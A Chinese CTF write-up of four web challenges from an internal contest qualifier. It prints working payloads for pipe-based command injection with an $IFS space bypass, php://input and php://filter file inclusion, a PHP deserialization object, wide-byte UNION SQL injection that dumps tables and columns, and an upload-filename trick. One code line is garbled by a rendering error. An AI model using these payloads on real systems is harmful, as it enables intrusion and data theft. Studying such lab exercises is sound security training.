某“工匠杯”比赛前某集团内部的一个预选赛,反正菜得没事做,就简单的看了一下其中的web题,做一个简单的记录。
1.从数据包上来看可以猜测出ip这里存在命令执行,有一点过滤,不过过滤不完全,试了一下,ip=127.0.0.1|ls&submit=PING即可成功(猜测这里代码过滤多半是跟dvwa的命令执行写法一样 (’| ’ => ‘’),由于后面多了个空格,导致可以突破)
构建post提交ip=127.0.0.1|ls&submit=PING即可看到flag.php
2.然后在通过ip=127.0.0.1|pwd&submit=PING得出路径为/var/www/html
3.然后直接读取即可,发现对空格存在过滤,payload: ip=127.0.0.1|cat$IFS/var/www/html/flag.php&submit=PING可得出flag
1.给的地址直接访问可以看到一段提示的代码
you are not admin !
<!--
$user = $_GET["user"];
$file = $_GET["file"];
$pass = $_GET["pass"];
if(isset($user)&&(file_get_contents($user,'r')==="the user is admin")){
echo "hello admin!
";
include($file); //class.php
}else{
echo "you are not admin ! ";
}
-->
2.从这段注释的代码可以看出要传递三个参数user、file、pass
然后要突破if(isset(KaTeX parse error: Expected 'EOF', got '&' at position 6: user)&̲&(file_get_cont…user,‘r’)===“the user is admin”))
也就是说要让user变量等于the user is admin
根据注释的提示,得出file = class.php
pass变量在这提示的代码里面没啥意义,暂时可以不管他
首先要突破这里想到了php伪协议php://input
构造post数据包如下
POST /?user=php://input&flie=class.php HTTP/1.1
Host: 192.168.1.1:56782
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 17
the user is admin
然后要去包含class.php,由于不知道class.php的位置,所以用到php的另一个封装协议:php://filter利用这个协议就可以读取任意文件
利用方法:php://filter/convert.base64-encode/resource=index.php
这里把读取到的index.php的内容转换为了base64的格式
POST /?user=php://input&file=php://filter/convert.base64-encode/resource=class.php HTTP/1.1
Host: 192.168.1.1:56782
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 17
the user is admin
PD9waHAKCmNsYXNzIFJlYWR7Ly9mMWFnLnBocAogICAgcHVibGljICRmaWxlOwogICAgcHVibGljIGZ1bmN0aW9uIF9fdG9TdHJpbmcoKXsKICAgICAgICBpZihpc3NldCgkdGhpcy0+ZmlsZSkpewogICAgICAgICAgICBlY2hvIGZpbGVfZ2V0X2NvbnRlbnRzKCR0aGlzLT5maWxlKTsKICAgICAgICB9CiAgICAgICAgcmV0dXJuICJfX3RvU3RyaW5nIHdhcyBjYWxsZWQhIjsKICAgIH0KfQo/Pgo=
通过base64解码得出一段代码
class Read{
//f1ag.php
public $file;
public function __toString(){
if(isset($this->file)){
echo file_get_contents($this->file);
}
return "__toString was called!";
}
}
?>
根据这个可以构建一个反序列化参数,具体数据包如下
POST /?user=php://input&file=class.php&pass=O:4:“Read”:1:{s:4:“file”;s:57:“php://filter/read=convert.base64-encode/resource=f1ag.php”;} HTTP/1.1
Host: 192.168.1.1:56782
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 17
the user is admin
使用base64解码即可得到flag
题目描述:参数id
直接访问sql1.php发现是乱码的,加上本身题目给的提示id,猜测这里可能是宽字节注入
尝试之后发现是宽字节注入
http://192.168.1.1:3036/sql1.php?id=%df'
http://192.168.1.1:3036/sql1.php?id=%df%27%20union%20select%201,%20database()%23得出数据库pwnhubsql1
http://192.168.1.1:3036/sql1.php?id=%df%27union%20select%201,group_concat(table_name)from%20information_schema.tables%20where%20table_schema=database()%23两个表article,flag
3.爆表字段
根据表名猜测在flag表里,这里将表flag进行16进制转换
http://192.168.1.1:3036/sql1.php?id=%df%27union%20select%201,group_concat(column_name)from%20information_schema.columns%20where%20table_name=0x666c6167%23爆出字段id,thisisflag
http://192.168.1.1:3036/sql1.php?id=%df%27union%20select%201,hex(group_concat(thisisflag))%20from%20flag%23
这道题比较铁憨憨
1.随便上传个图片,他说要给我一个give_me_flag.php 我才给你flag!
2.于是就把名字改成give_me_flag.php得到flag
总的来说,题比较简单,没啥特别的难度,就做着玩玩啥的,emmm就这样吧。